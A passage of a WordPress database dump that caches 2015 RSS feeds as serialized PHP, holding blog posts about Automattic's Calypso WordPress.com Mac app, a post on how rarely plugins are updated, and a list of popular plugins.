                                                                When the application is in full-screen mode, it looks great and blocks out distractions. In the most recent update however, the Preview button acts like a Save button and doesn’t show a preview of the post. This is likely a bug and will be fixed in a later version.

                                                                \n

                                                                \"CalypsoPostEditingScreen\"Calypso is a great example of what’s possible with the WordPress REST API. There are still a few instances when clicking a button takes you outside the app but those will be fixed in future updates.

                                                                \n

                                                                Overall, it’s convenient to have access to most of WordPress’ features without interacting with a browser. For those who use a Mac, I can easily see Calypso being the preferred way to interact and manage WordPress sites.

                                                                \n

                                                                As Matt Mullenweg mentions in his post, there’s still a lot of work left to do, “This is a beginning, not an ending. (1.0 is the loneliest.) Better things are yet to come, as all of you dig in.” Calypso is available for free but you’ll need a WordPress.com account which is also free.

                                                                \n

                                                                If you own a Mac and test drive Calypso, please share your experience with us in the comments.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Nov 2015 18:01:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"Post Status: Automattic has released an open source WordPress.com Mac app\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"https://poststatus.com/?p=14990\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://poststatus.com/wordpress-com-mac-app/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5105:\"

                                                                Today, Automattic released their official WordPress.com Mac app, that was codenamed Calypso during development, that allows users to manage both WordPress.com and Jetpack enabled websites using a desktop interface. The code behind the app is also the foundation for a new version of the WordPress.com browser editor.

                                                                \n

                                                                Here’s a quick video walkthrough:

                                                                \n

                                                                \n

                                                                The new WordPress.com app development occurred over the course of at least 18 months, according to the press release, with input from more than 140 Automatticians. Andy Peatling, who has been at Automattic since 2008, was the project lead.

                                                                \n

                                                                If you could rebuild the admin from scratch

                                                                \n

                                                                Matt Mullenweg said that Automattic wanted to completely rethink the WordPress admin experience, without the burden of backward compatibility that WordPress core must hold sacred:

                                                                \n

                                                                What would we build if we were starting from scratch today, knowing all we’ve learned over the past 13 years of building WordPress? At the beginning of last year, we decided to start experimenting and see.

                                                                \n

                                                                Calypso was an ambitious project. Not only does it bring the WordPress editing and publishing experience to a Mac app, but pretty much the entire WordPress.com admin experience is now available on the desktop, from stats to theme shopping.

                                                                \n

                                                                While the app is definitely geared toward the experience one would expect on a WordPress.com website, you can also manage Jetpack enabled websites with it. The Jetpack Manage feature must be enabled for it to work, and I admit I struggled to get it to function with my own (personal) website. However, I’m sure it’ll get any kinks worked out, and anyone looking for basic website management, but are on WordPress.org, may enjoy the experience.

                                                                \n

                                                                Open sourcing WordPress.com

                                                                \n

                                                                The most important part of the announcement is that Automattic is open sourcing Calypso and the many APIs that help drive it.

                                                                \n

                                                                A lot of people thought we should keep this proprietary, but throughout my life I’ve learned that the more you give away, the more you get back. We still have a ton to figure out around plugins, extensibility, contributions, Windows and Linux releases, API speed, localization, and harmonizing the WordPress.com API and WP-API so it can work with core WordPress. Thousands more PHP developers will need to become fluent with Javascript to recreate their admin interfaces in this fashion. I’m also really excited to revisit and redesign many more screens now that we have this first version out the door.

                                                                \n

                                                                I’m really glad they chose to open source it. I agree with Matt that both the app and the broader community will benefit from the decision; though I don’t doubt it may have been a tough sell to investors.

                                                                \n

                                                                I also agree with Ben Thompson (a former Automattician, by chance), who once said that proprietary software itself isn’t necessarily what makes a company successful, but rather, “companies that are built on software but differentiated by a difficult-to-replicate complement to said software.”

                                                                \n

                                                                In Automattic’s case, open sourcing the techniques to build the app isn’t giving away what is most valuable. What is most valuable to them is what they gain from the open source nature of the software, that will allow them to improve the experience for their vast WordPress.com user base.

                                                                \n

                                                                Calypso is a good step forward for WordPress.com

                                                                \n

                                                                I’ve worried for a while now that Automattic may be letting their audience slip, by falling behind the ease of use of other tools, like Medium. I think the new WordPress.com editor, and the corresponding WordPress.com app, are a great improvement to the writing experience, and I think that the investment they’ve made is a smart one.

                                                                \n

                                                                I’ll be digging more into the code and developer components of the new APIs and the Mac app soon. I didn’t have access to that data prior to launch.

                                                                \n

                                                                The new app is available for download from WordPress.com now, or you can of course test drive the browser version directly on WordPress.com. You can also see the developer features, code on Github, the backstory from Andy Peatling, and see both WordPress.com’s announcement, as well as Matt’s.

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Nov 2015 17:06:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Matt: Dance to Calypso\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=45611\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/11/dance-to-calypso/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7834:\"

                                                                One of the hardest things to do in technology is disrupt yourself.

                                                                \n

                                                                But we’re trying our darndest, and have some cool news to introduce today. When I took on the responsibility of CEO of Automattic January of last year, we faced two huge problems: our growth was constrained by lack of capital, and the technological foundations of the past decade weren’t strong enough for the demands of next one.

                                                                \n

                                                                The first has a relatively straightforward answer. We found some fantastic partners, agreed on a fair price, issued new equity in the company to raise $160M, and started investing in areas we felt were high potential, like this year’s WooCommerce acquisition. This “war chest” gives us a huge array of options, especially given our fairly flat burn rate — we don’t need to raise money again to keep the company going, and any capital we raise in the future will be purely discretionary. (Since last May when the round happened we’ve only spent $3M of the investment on opex.)

                                                                \n

                                                                The second is much harder to address. The WordPress codebase is actually incredible in many ways — the result of many thousands of people collaborating over 13 years — but some of WordPress’ greatest strengths were also holding it back.

                                                                \n

                                                                The WordPress codebase contains a sea of institutional knowledge and countless bug fixes. It handles hundreds of edge cases. Integrates constant security improvements. Is coded to scale. Development moves at a fast clip, with six major releases over the past two years and more around the corner. Its power and flexibility is undeniable: WordPress just passed a huge milestone, and now powers 25% of the web. You can run it on a $5-a-month web host, or scale it up to serve billions of pageviews on one of the largest sites on the web, WordPress.com.

                                                                \n

                                                                The interface, however, has been a struggle. Many of us attempted to give it a reboot with the MP6 project and the version 3.8 release, but what that release made clear to me is that an incremental approach wouldn’t give us the improvements we needed, and that two of the things that helped make WordPress the strong, stable, powerful tool it is — backward compatibility and working without JavaScript — were actually holding it back.

                                                                \n

                                                                The basic paradigms of wp-admin are largely the same as they were five years ago. Working within them had become limiting. The time seemed ripe for something new, something big… but if you’re going to break back compat, it needs to be for a really good reason. A 20x improvement, not a 2x. Most open source projects fade away rather than make evolutionary jumps.

                                                                \n

                                                                So we asked ourselves a big question. What would we build if we were starting from scratch today, knowing all we’ve learned over the past 13 years of building WordPress? At the beginning of last year, we decided to start experimenting and see.

                                                                \n

                                                                Today we’re announcing something brand new, a new approach to WordPress, and open sourcing the code behind it. The project, codenamed Calypso, is the culmination of more than 20 months of work by dozens of the most talented engineers and designers I’ve had the pleasure of working with (127 contributors with over 26,000 commits!).

                                                                \n

                                                                \"gm-2015-final\"

                                                                \n

                                                                Calypso is…

                                                                \n
                                                                  \n
                                                                • Incredibly fast. It’ll charm you.
                                                                • \n
                                                                • Written purely in JavaScript, leveraging libraries like Node and React.
                                                                • \n
                                                                • 100% API-powered. Those APIs are open, and now available to every developer in the world.
                                                                • \n
                                                                • A great place to read, allowing you to follow sites across the web (even if they’re not using WordPress).
                                                                • \n
                                                                • Social, with stats, likes, and notifications baked in.
                                                                • \n
                                                                • Fully responsive. Make it small and put it in your sidebar, or go full-screen.
                                                                • \n
                                                                • Really fun to write in, especially the drag-and-drop image uploads.
                                                                • \n
                                                                • Fully multi-site for advanced users, so you can manage hundreds of WordPresses from one place.
                                                                • \n
                                                                • Able to manage plugins and themes on Jetpack sites, including auto-upgrading them!
                                                                • \n
                                                                • 100% open source, with all future development happening in the open.
                                                                • \n
                                                                • Available for anyone to adapt to make their own, including building custom interfaces, distributions, or working with web services besides WordPress.com.
                                                                • \n
                                                                \n

                                                                A lot of people thought we should keep this proprietary, but throughout my life I’ve learned that the more you give away, the more you get back. We still have a ton to figure out around plugins, extensibility, contributions, Windows and Linux releases, API speed, localization, and harmonizing the WordPress.com API and WP-API so it can work with core WordPress. Thousands more PHP developers will need to become fluent with JavaScript to recreate their admin interfaces in this fashion. I’m also really excited to revisit and redesign many more screens now that we have this first version out the door.

                                                                \n

                                                                This is a beginning, not an ending. (1.0 is the loneliest.) Better things are yet to come, as all of you dig in. Check out these links to read more about Calypso from different perpsectives:

                                                                \n\n

                                                                This was a huge bet, incredibly risky, and difficult to execute, but it paid off. Like any disruption it is uncomfortable, and I’m sure will be controversial in some circles. What the team has accomplished in such a short time is amazing, and I’m incredibly proud of everyone who has contributed and will contribute in the future. This is the most exciting project I’ve been involved with in my career.

                                                                \n

                                                                With core WordPress on the server and Calypso as a client I think we have a good chance to bring another 25% of the web onto open source, making the web a more open place, and people’s lives more free.

                                                                \n

                                                                If you’re curious more about the before and after, what’s changed, here’s a chart:

                                                                \n

                                                                \"Whats-New-WPcom@2x\"

                                                                \n

                                                                 

                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 23 Nov 2015 17:01:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"WPTavern: Nearly Half of the WordPress Plugins in the Directory Are Not Updated After Two Years\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=49050\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"http://wptavern.com/nearly-half-of-the-wordpress-plugins-in-the-directory-are-not-updated-after-two-years\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2813:\"

                                                                Luca Fracassi, founder of Addendio, an alternative search engine for the WordPress plugin and theme directories published an in-depth look at the WordPress plugin directory. The post includes data that shows the number of plugins added to the directory per year, what year the plugins were last updated, and other metrics.

                                                                \n

                                                                My favorite data point is the number of plugins approved per year. Based on this data, it looks like it’s going to be another record year for the directory. The five active team members including, Mika Epstein, Pippin Williamson, and Samuel Wood have their work cut out for them.

                                                                \n\"NumberNumber of Plugins Added Per Year\n

                                                                According to the data, about 22K plugins have been updated in the last 24 months representing a little more than half the directory. This means that approximately half of the plugins in the directory are displaying a notice that the plugin hasn’t been updated in two years.

                                                                \n\"UpdateUpdate Notice After Two Years of No Updates\n

                                                                Fracassi says that based on the data, “Two out of ten plugins are updated after three years. If you pick a free plugin that is released today, there’s a 80-90% chance that in three years time you won’t have any more updates.”

                                                                \n

                                                                There are a number of possibilities as to why a plugin doesn’t get updated for two years or more.

                                                                \n
                                                                  \n
                                                                1. The developer burns out or moves on.
                                                                2. \n
                                                                3. The plugin doesn’t need an update.
                                                                4. \n
                                                                5. Lack of donations.
                                                                6. \n
                                                                7. Support is too much of a burden.
                                                                8. \n
                                                                9. No time.
                                                                10. \n
                                                                \n

                                                                The data doesn’t spell doom and gloom for users but it clearly shows that many plugins within the directory don’t have a long shelf life. I encourage you to read Fracassi’s post and review the data he’s collected. Also check out our guide on how to choose a WordPress plugin.

                                                                \n
                                                                \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 20 Nov 2015 19:36:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 15 Dec 2015 21:54:03 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"247319\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Tue, 15 Dec 2015 21:30:15 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 250\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20130911040210\";}','no'),(15654,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1450259645','no'),(15655,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1450216445','no'),(15656,'_transient_timeout_feed_b9388c83948825c1edaef0d856b7b109','1450259646','no'),(15657,'_transient_feed_b9388c83948825c1edaef0d856b7b109','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n \n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:117:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"WordPress Plugins » View: Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"https://wordpress.org/plugins/browse/popular/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"WordPress Plugins » View: Popular\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 15 Dec 2015 21:29:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:30:{i:0;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"TinyMCE Advanced\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wordpress.org/plugins/tinymce-advanced/#post-2082\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Jun 2007 15:00:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2082@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Enables the advanced features of TinyMCE, the WordPress WYSIWYG editor.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Andrew Ozz\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WooCommerce - excelling eCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/woocommerce/#post-29860\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Sep 2011 08:13:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29860@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"WooCommerce is a powerful, extendable eCommerce plugin that helps you sell anything. Beautifully.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"WooThemes\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:24:\"Jetpack by WordPress.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/jetpack/#post-23862\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Jan 2011 02:21:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"23862@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Your WordPress, Simplified.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Tim Moore\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Hello Dolly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://wordpress.org/plugins/hello-dolly/#post-5790\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 May 2008 22:11:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"5790@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:150:\"This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Matt Mullenweg\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Wordfence Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wordfence/#post-29832\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 04 Sep 2011 03:13:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"29832@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:138:\"The Wordfence WordPress security plugin provides free enterprise-class WordPress security, protecting your website from hacks and 